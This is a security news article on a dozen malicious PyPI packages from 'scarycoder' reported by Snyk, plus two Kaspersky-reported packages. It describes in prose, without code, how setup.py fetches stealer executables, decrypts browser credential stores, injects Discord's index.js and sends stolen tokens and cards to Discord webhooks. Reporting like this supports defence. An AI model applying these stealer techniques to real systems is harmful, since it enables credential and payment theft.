A dozen malicious PyPi packages have been discovered installing malware that modifies the Discord client to become an information-sealing backdoor and stealing data from web browsers and Roblox.
The twelve packages were uploaded to the Python Package Index (PyPI) on August 1, 2022, by a user named “scarycoder,” and discovered by researchers at Snyk.
Contrary to the common typo-squatting approach, these packages use their own names and promise various features to promote themselves to interested developers.
The Python packages pretend to be Roblox tools, thread management, and basic hacking modules, but none feature the promised functionality. Instead, the packages install password-stealing malware on developers’ devices.
Unfortunately, this malicious set of PyPi Python packages has not been removed from the open source package repository at the time of writing this, so software developers are still at risk.
A dirty dozen
As part of a new report by Snyk, researchers analyze one of these malicious Python packages named “cyphers,” showing how malicious code hidden in the “setup.py” file is used to install two malware executables from a Discord CDN server, namely “ZYXMN.exe” and “ZYRBX.exe.”
The behavior is the same for all packages in the set, except for “hackerfilelol” and “hackerfileloll,” which use a single malicious executable named “Main.exe.”
The first binary, ZYXMN.exe, is used to steal information from Google Chrome, Chromium, Microsoft Edge, Firefox, and Opera, including stored passwords, browser history, cookies, and search history.
To steal information from browsers, the malware will decrypt the web browser’s local database master key to retrieve cleartext data of the victim’s search history, browsing history, cookies, bookmarks, stored passwords, and stored credit cards. This information is then uploaded to the threat actors via a Discord webhook.
To steal data from Discord, the malware modifies the index.js file under the ‘discord_desktop_core’ folder to add the malicious Discord-Injection script. The clients targeted for this injection are Discord, Discord Development, Discord Canary, and Discord PTB (Public Test Build).
With the script injected, when Discord is restarted, it will perform a variety of negative behavior, including stealing authentication tokens, Nitro status, billing information, and credit cards.
The second malware, ZYRBX.exe, focuses solely on Roblox, attempting to steal the account cookie, user ID, Robux balance, and account Premium status of the online gaming platform and exfiltrate it to a Discord webhook.
More malware on PyPI
Yesterday, Kaspersky published a report where it presented two other PyPi packages that contain info-stealing malware and also modify the Discord client as well.
The stealers in those packages focus on collecting account credentials from cryptocurrency wallets, Steam, and Minecraft, while an injected script monitors for inputs like email addresses, passwords, and billing information.
After this step, the stealer scans the host’s Downloads, Documents, and Desktop folders to locate 2FA recovery lists, password text files, Discord tokens, Paypal account info, and more.
The malicious duo discovered by Kaspersky are “pyquest” and “ultrarequests,” mimicking projects with millions of downloads and even cloning their code.
PyPI’s response to malicious package reports appears to be slow, with malicious packages remaining online for days after being reported. This is likely the result of a small team of volunteers with a limited budget being overwhelmed by constant malware uploads.
Unfortunately, this gives more uptime to the malicious packages and increases the chances of software developers becoming victims of this malware.